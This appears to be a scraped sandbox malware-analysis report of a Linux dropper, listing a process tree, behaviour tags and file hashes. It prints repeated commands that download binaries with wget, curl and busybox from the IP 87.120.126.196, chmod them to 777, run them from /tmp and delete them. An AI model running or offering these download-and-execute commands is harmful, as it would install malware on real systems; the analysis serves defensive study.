/usr/bin/wgetwget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:954
-
-
/bin/chmodchmod 777 EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx./EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵PID:960
-
-
/bin/chmodchmod 777 nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH./nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:966
-
-
/bin/chmodchmod 777 s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB./s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:972
-
-
/bin/chmodchmod 777 ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr./ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:978
-
-
/bin/chmodchmod 777 gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK./gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:984
-
-
/bin/chmodchmod 777 vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y./vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:987
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:988
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:990
-
-
/bin/chmodchmod 777 Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd./Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:993
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97